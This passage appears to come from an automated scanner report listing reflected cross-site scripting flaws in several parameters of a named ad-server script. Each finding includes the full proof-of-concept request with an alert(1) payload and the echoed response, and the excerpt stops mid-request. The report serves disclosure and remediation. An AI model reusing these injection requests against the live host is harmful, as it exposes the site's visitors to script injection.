GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.comc841c'%3balert(1)//719d9a49b95&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:12 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57690
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
hYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.comc841c';alert(1)//719d9a49b95" target="_blank">
...[SNIP]...

4.73. http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the clickTagURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa1a"-alert(1)-"d02b9250581 was submitted in the clickTagURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.comcfa1a"-alert(1)-"d02b9250581&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:09 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57688
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
mNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.comcfa1a"-alert(1)-"d02b9250581&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.
...[SNIP]...

4.74. http://as.jivox.com/player/jivox_ad_tags.php [iframeTag parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the iframeTag request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec57f"-alert(1)-"6c64bcf253 was submitted in the iframeTag parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=onec57f"-alert(1)-"6c64bcf253&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:57 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57659
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
250);
jvxAdPlayer.setServerURL("http://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=onec57f"-alert(1)-"6c64bcf253&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5Nj
...[SNIP]...

4.75. http://as.jivox.com/player/jivox_ad_tags.php [jivoxBranded parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the jivoxBranded request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57b6e"-alert(1)-"b2e0605808c was submitted in the jivoxBranded parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false57b6e"-alert(1)-"b2e0605808c&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:46 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
kMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false57b6e"-alert(1)-"b2e0605808c&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&jvxSessionId=130796302
...[SNIP]...

4.76. http://as.jivox.com/player/jivox_ad_tags.php [maxAds parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the maxAds request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 251ba"-alert(1)-"51984580583 was submitted in the maxAds parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3251ba"-alert(1)-"51984580583&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:24 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3251ba"-alert(1)-"51984580583&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.
...[SNIP]...

4.77. http://as.jivox.com/player/jivox_ad_tags.php [mouseAction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the mouseAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65140"-alert(1)-"00b5d1dee29 was submitted in the mouseAction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver65140"-alert(1)-"00b5d1dee29&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:16 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
HN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver65140"-alert(1)-"00b5d1dee29&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=
...[SNIP]...

4.78. http://as.jivox.com/player/jivox_ad_tags.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78c54"-alert(1)-"6fea4a27bbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&78c54"-alert(1)-"6fea4a27bbd=1 HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:04:09 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57663
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
e=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&78c54"-alert(1)-"6fea4a27bbd=1&jvxSessionId=1307963049.2948");
jvxAdPlayer.setPlayerObjectId("jvxAdPlayer");
jvxAdPlayer.setPlayerObject(jvxAdPlayer);
jvxAdPlayer.render();
}


4.79. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a375c'%3balert(1)//e99e5f54d4b was submitted in the objectName parameter. This input was echoed as a375c';alert(1)//e99e5f54d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayera375c'%3balert(1)//e99e5f54d4b&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
